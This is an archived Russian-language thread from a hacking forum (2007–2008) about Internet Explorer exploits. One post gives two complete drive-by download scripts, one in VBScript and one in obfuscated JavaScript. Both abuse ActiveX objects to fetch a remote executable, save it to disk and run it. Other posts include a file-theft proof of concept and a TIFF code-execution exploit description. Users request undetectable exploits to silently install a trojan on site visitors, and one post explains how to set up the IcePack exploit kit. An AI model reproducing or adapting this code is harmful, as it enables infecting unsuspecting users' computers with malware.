ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Безопасность > Защита ОС: вирусы, антивирусы, файрволы.
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #41  
Старый 02.10.2007, 01:55
THE_END
Новичок
Регистрация: 29.07.2006
Сообщений: 16
Провел на форуме:
125133

Репутация: 19
Отправить сообщение для THE_END с помощью ICQ
По умолчанию

Уязвимости в Microsoft Internet Explorer (всего 117 ).



Уязвимость позволяет удаленному пользователю получить доступ к важным данным.

PHP код:

<script>

function 
Clear() {
document.getElementById("label1").htmlFor="file1";
document.getElementById("text1").focus();
}

function 
Down() {
document.getElementById("file1").focus();
}

</
script>

<
input type="file" id="file1" name="file1" onkeydown="Clear()" onkeyup="Clear()" />
<
label id="label1" name="label1"></label>
<
br />
<
textarea name="text1" id="text1" onkeydown="Down()">
</
textarea
© securitylab.ру

Последний раз редактировалось THE_END; 02.10.2007 в 02:01..
 
Ответить с цитированием

Microsoft Internet Explorer TIF/TIFF Code Execution (MS07-055)
  #42  
Старый 22.11.2007, 16:51
gibson
Moderator - Level 7
Регистрация: 24.02.2006
Сообщений: 447
Провел на форуме:
2872049

Репутация: 705
Отправить сообщение для gibson с помощью ICQ
По умолчанию Microsoft Internet Explorer TIF/TIFF Code Execution (MS07-055)

Internet Explorer has standart ImageBase address and PE Win32 header is started at 0x00400000 in memory. So memory cell at the address
0x00400008 contains the short value 0x0004 and at the address
0x00400011 it contains the long value 0x00000000 in any case.
I used these addresses for generating of TIFF-file that uses vulnerability and for controling of EIP.

This exploit tested on:
- Windows 2000 SP4 + IE5.01
- Windows 2000 SP4 + IE5.5
- Windows 2000 SP4 + IE6.0 SP1
_http://www.milw0rm.com/exploits/4616 2007-11-11
 
Ответить с цитированием

  #43  
Старый 03.12.2007, 02:19
tusman
Познающий
Регистрация: 02.06.2007
Сообщений: 39
Провел на форуме:
553176

Репутация: 15
По умолчанию

Цитата:
прив. всем. Вот хотелбы спросить , есть ли статья для Новечков как пользоваться сплоитам ... в Общем мне нужно тока одно чтоб человек заходил на сайт и ему загружался трой ( Пинчег ) . Кто может дать сылку на статью про Сплоиты и какой сплоит посоветуйте для этого , онли паблик ... Просто друг мне еще обещал закриптить его ...
Меня тоже интересует ! Дайте пожалуйста линк где можно об этом почитать !
 
Ответить с цитированием

  #44  
Старый 03.12.2007, 04:11
Francuz
Участник форума
Регистрация: 02.11.2007
Сообщений: 108
Провел на форуме:
413996

Репутация: 47
Отправить сообщение для Francuz с помощью ICQ Отправить сообщение для Francuz с помощью MSN Отправить сообщение для Francuz с помощью Yahoo
По умолчанию

to tusman & L0n1

вот видео....
http://video.antichat.ru/file179.html
 
Ответить с цитированием

  #45  
Старый 13.12.2007, 22:56
_Sniper_
Banned
Регистрация: 21.07.2007
Сообщений: 504
Провел на форуме:
1899369

Репутация: 445


Отправить сообщение для _Sniper_ с помощью ICQ
По умолчанию

Цитата:
Сообщение от Francuz  
to tusman & L0n1

вот видео....
http://video.antichat.ru/file179.html
Скрипт палицца. Как его криптануть шолей?))
 
Ответить с цитированием

  #46  
Старый 15.01.2008, 01:07
Витян
Участник форума
Регистрация: 25.12.2006
Сообщений: 220
Провел на форуме:
2544458

Репутация: 243
По умолчанию

пара эксплоитов для для ие 6, последний билд авант браузера тож пробивает. позволяет скачать и запустить файл хз выкладывалось или нет, кто сможет криптануть мне в личку напишите

Код:
<SCRIPT language="VBScript">

Module_Path="http://путь до файла.exe"

   If navigator.appName="Microsoft Internet Explorer" Then

      If InStr(navigator.platform,"Win32") <> 0  Then

      Const ssfFONTS=20
      Const adModeReadWrite=3
      Const adTypeBinary=1
      Const adSaveCreateOverWrite=2

      Dim  oRDS
      Dim  oXMLHTTP
      Dim  oFSO
      Dim  oStream
      Dim  oWShell
      Dim  oShellApp

      Dim  WinDir
      Dim  ExeName
      Dim  XMLBody
      Dim  PluginFile
      Dim  cByte
      Dim   ObjName
      Dim   ObjProg

      Randomize

      ExeName=GenerateName()
      ExeName=ExeName & ".exe"

      cls1="clsid:BD96"
      cls2="C556-65A"
      cls3="3-11D0-9"
      cls4="83A-00C04FC29E36"
      clsfull=cls1&cls2&cls3&cls4

      Set  oRDS=document.createElement("object")
      oRDS.setAttribute "id","oRDS"
      oRDS.setAttribute "classid",clsfull

      Set oShellApp = oRDS.CreateObject("Shell.Application","")
      Set oFolder = oShellApp.NameSpace(ssfFONTS)
      Set oFolderItem=oFolder.ParseName("Symbol.ttf")
      Font_Path_Components=Split(oFolderItem.Path,"\",-1,1)
      WinDir= Font_Path_Components(0) & "\" &  Font_Path_Components(1) & "\"
      ExeName=WinDir & ExeName

      ObjName="Microsoft"
      ObjProg="XMLHTTP"
      set oXMLHTTP = CreateObject(ObjName & "." & ObjProg)
      Req_type="G" & "E" & "T"
      HTTPSession=oXMLHTTP.Open(Req_Type,Module_Path,0)
      oXMLHTTP.Send()
      On Error Resume Next
      XMLBody=oXMLHTTP.responseBody

      ObjName="ADODB"
      ObjProg="Stream"
      On Error Resume Next
      Set oStream=oRDS.CreateObject(ObjName & "." & ObjProg,"")
      If Err.number <> 0 Then

            Set oFSO=oRDS.CreateObject("Scripting.FileSystemObject","")
            Set PluginFile=oFSO.CreateTextFile(ExeName, TRUE)
            Plugin_size=LenB(XMLBody)

            For j=1 To Plugin_size
                cByte=MidB(XMLBody,j,1)
                ByteCode=AscB(cByte)
                PluginFile.Write(Chr(ByteCode))
            Next
            PluginFile.Close

            Set  oWShell=oRDS.CreateObject("WScript.Shell","")
            On Error Resume Next
            oWShell.Run (ExeName),1,FALSE
      Else
            oStream.Mode=adModeReadWrite
            oStream.Type=adTypeBinary
            oStream.Open
            oStream.Write XMLBody
            oStream.SaveToFile ExeName,adSaveCreateOverWrite

            oShellApp.ShellExecute ExeName
      End If


      End If
   End If

Function GenerateName()
RandomName=""
rr=Int(8*Rnd)
ik=0
Do
  ii=Int(25*Rnd)+97
  RandomName=RandomName+Chr(ii)
  ik=ik+1
Loop While ik<rr
GenerateName=RandomName
End Function

</SCRIPT>
Код:
<SCRIPT language="javascript">

var bb949531092ff = "http://путь до файла";
function CreateO(o, n) {
        var r = null;
        
        try { eval('r = o.CreateObject(n)') }catch(e){}
        
        if (! r) {
                try { eval('r = o.CreateObject(n, "")') }catch(e){}
        }
        
        if (! r) {
                try { eval('r = o.CreateObject(n, "", "")') }catch(e){}
        }

        if (! r) {
                try { eval('r = o.GetObject("", n)') }catch(e){}
        }
        
        if (! r) {
                try { eval('r = o.GetObject(n, "")') }catch(e){}
        }
        
        if (! r) {
                try { eval('r = o.GetObject(n)') }catch(e){}
        }
        
        return(r);      
}

function Go(a) {
        var s = CreateO(a, "WSc"+"rip"+"t.Sh"+"ell");
        var o = CreateO(a, "ADO"+"DB.Str"+"eam");
        var e = s.Environment("Process");
        
        var bb351865611ff = null;
       	var bin = e.Item("TEMP")+ "\\" + "fdklkjTUFOYUT.exe";
        var bb532058559ff; 
        
        try { bb351865611ff=new XMLHttpRequest(); }
        catch(e) {
                try { bb351865611ff = new ActiveXObject("Micr"+"osoft.XMLH"+"TTP"); }
                catch(e) {
                        bb351865611ff = new ActiveXObject("MS"+"XML2.Serv"+"erXMLH"+"TTP");
                }
        }
        
        if (! bb351865611ff) return(0);
           
        bb351865611ff.open("GET", bb949531092ff, false)
        bb351865611ff.send(null);
        bb532058559ff = bb351865611ff.responseBody;
        
        o.Type = 1;
        o.Mode = 3;
        o.Open();
        o.Write(bb532058559ff);
        o.SaveToFile(bin, 2);
                     
        s.Run(bin,0);
}

var i = 0;
var bb804375678ff = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}','{BD96C556-65A3-11D0-983A-00C04FC29E36}','{AB9BCEDD-EC7E-47E1-9322-D4A210617116}','{0006F033-0000-0000-C000-000000000046}','{0006F03A-0000-0000-C000-000000000046}','{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}','{6414512B-B978-451D-A0D8-FCFDF33E833C}','{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}','{06723E09-F4C2-43c8-8358-09FCD1DB0766}','{639F725F-1B2D-4831-A9FD-874847682010}','{BA018599-1DB3-44f9-83B4-461454C84BF8}','{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}','{E8CCCDDF-CA28-496b-B050-6C07C962476B}',null);
        
while (bb804375678ff[i]) {
             var a = null;
              
             if (bb804375678ff[i].substring(0,1) == '{') {
                     a = document.createElement("object");
                      a.setAttribute("classid", "clsid:" + bb804375678ff[i].substring(1, bb804375678ff[i].length - 1));
              } else {
                     try { a = new ActiveXObject(bb804375678ff[i]); } catch(e){}
             }
              
              if (a) {
                      try {           
                             var b = CreateO(a, "WSc"+"ript.She"+"ll");
                              if (b) {
                                     Go(a);
                                     //return(0);
                              }
                     } catch(e){}
               }
             i++;
 }

</script>

Последний раз редактировалось Витян; 15.01.2008 в 01:15..
 
Ответить с цитированием

  #47  
Старый 15.01.2008, 01:16
Mo4x
Постоянный
Регистрация: 18.02.2007
Сообщений: 416
Провел на форуме:
3509350

Репутация: 412
По умолчанию

Снайпер В разделе статъи полась
 
Ответить с цитированием

  #48  
Старый 17.01.2008, 08:30
tusman
Познающий
Регистрация: 02.06.2007
Сообщений: 39
Провел на форуме:
553176

Репутация: 15
По умолчанию

Всем прет )
Я понимаю что моя репа желает лучшего ) но может кто подскажет какой нить на данный момент рабочий не палющийся експлойт для закачки и запуска удаленного файла ?
Биг спасибо всем кто откликнется !)
 
Ответить с цитированием

  #49  
Старый 17.01.2008, 08:57
Belfigor
Участник форума
Регистрация: 14.11.2007
Сообщений: 195
Провел на форуме:
1210861

Репутация: 98
Отправить сообщение для Belfigor с помощью ICQ
По умолчанию

Цитата:
Сообщение от tusman  
Всем прет )
Я понимаю что моя репа желает лучшего ) но может кто подскажет какой нить на данный момент рабочий не палющийся експлойт для закачки и запуска удаленного файла ?
Биг спасибо всем кто откликнется !)
вот не в обиду тебе сказанно , но ты опять написал глупость , во первых которые в паблике (они все паляться ) , которые не ПАЛЯТСЯ ( все приватные ) , а для закачки и запуска, найди и скачай icepack в инете его полно

зы чтобы не было вопросов далее про icepack , поясняю , нашёл , скачал , если в ты в локалке ставишь себе Denver и тд и тп , далее заливаешь этот пакет ,на сервер , настраеваешь(этот пакет) через админку icepacka, то есть зальёшь нужные тебе файлы (трой ),далее отмечаешь какие он будет пробивать браузеры (iE 6 пробивается ) , делаешь ссылку на твой ресурс http://tusman.com , для локалки http://xxx.xxx.xxx.xxx/ и вперёд .

зы но сначало проверь на себе !

Последний раз редактировалось Belfigor; 17.01.2008 в 09:08..
 
Ответить с цитированием

  #50  
Старый 17.01.2008, 09:19
Vorlan
Познающий
Регистрация: 09.06.2007
Сообщений: 68
Провел на форуме:
184133

Репутация: 18
По умолчанию

мда, так ничего, вполне рабочий способ, но я больше предпочитаю работать с Metasploit Framework. Вручную, конечно некоторым сложно обновлять эксплойты, но по-моему им проще пользоваться.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ